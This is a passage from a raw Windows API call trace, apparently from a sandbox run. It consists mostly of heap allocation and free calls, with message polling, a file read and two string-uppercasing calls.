hHeap=0x2af0000) returned 1 [0104.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0104.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0104.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0104.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0104.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0104.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0104.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0104.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0104.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0104.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0104.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0104.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0104.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0104.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0104.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0104.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0104.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0104.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0104.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0104.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0104.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0104.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0104.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0104.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0104.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0104.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0104.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0104.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0104.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0104.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0104.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0104.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0104.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0104.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0104.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0104.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0104.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0104.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0104.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0104.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0104.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0104.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4ca0020 [0104.229] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0104.229] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x408e, lpOverlapped=0x0) returned 1 [0104.230] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0104.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0104.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0104.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0104.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0104.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x408e) returned 0x2ace888 [0104.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4ca0020 | out: hHeap=0x2af0000) returned 1 [0104.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0104.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0104.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0104.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0104.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0104.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0104.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0104.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0104.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x408e) returned 0x2a7a130 [0104.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ace888 | out: hHeap=0x2af0000) returned 1 [0104.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0104.234] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0104.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0104.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0104.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0104.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0104.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x408e) returned 0x2ace888 [0104.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0104.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ace888 | out: hHeap=0x2af0000) returned 1 [0104.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0104.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0104.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0104.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0104.235] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0104.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0104.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0104.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0104.235] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0104.235] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0104.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0104.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b28 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x408e) returned 0x2ace888 [0104.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730c8 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0104.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a716e8 [0104.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0104.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71718 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0104.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96e8 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0104.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x408e) returned 0x2a7e1c8 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0104.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0104.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0104.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0104.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0104.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0104.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0104.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0104.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0104.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0104.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0104.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0104.237] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0104.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0104.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0104.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0104.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0104.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0104.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0104.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0104.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0104.237] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0104.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0104.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0104.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0104.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0104.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0104.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0104.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0104.237] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0104.237] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0104.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0104.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0104.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0104.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0104.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0104.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0104.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0104.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0104.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0104.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0104.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0104.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0104.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0104.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0104.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0104.238] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0104.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0104.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0104.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0104.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0104.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0104.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0104.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0104.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0104.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0104.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0104.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0104.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0104.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0104.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0104.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0104.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0104.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0104.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0104.240] RtlAllocateHeap 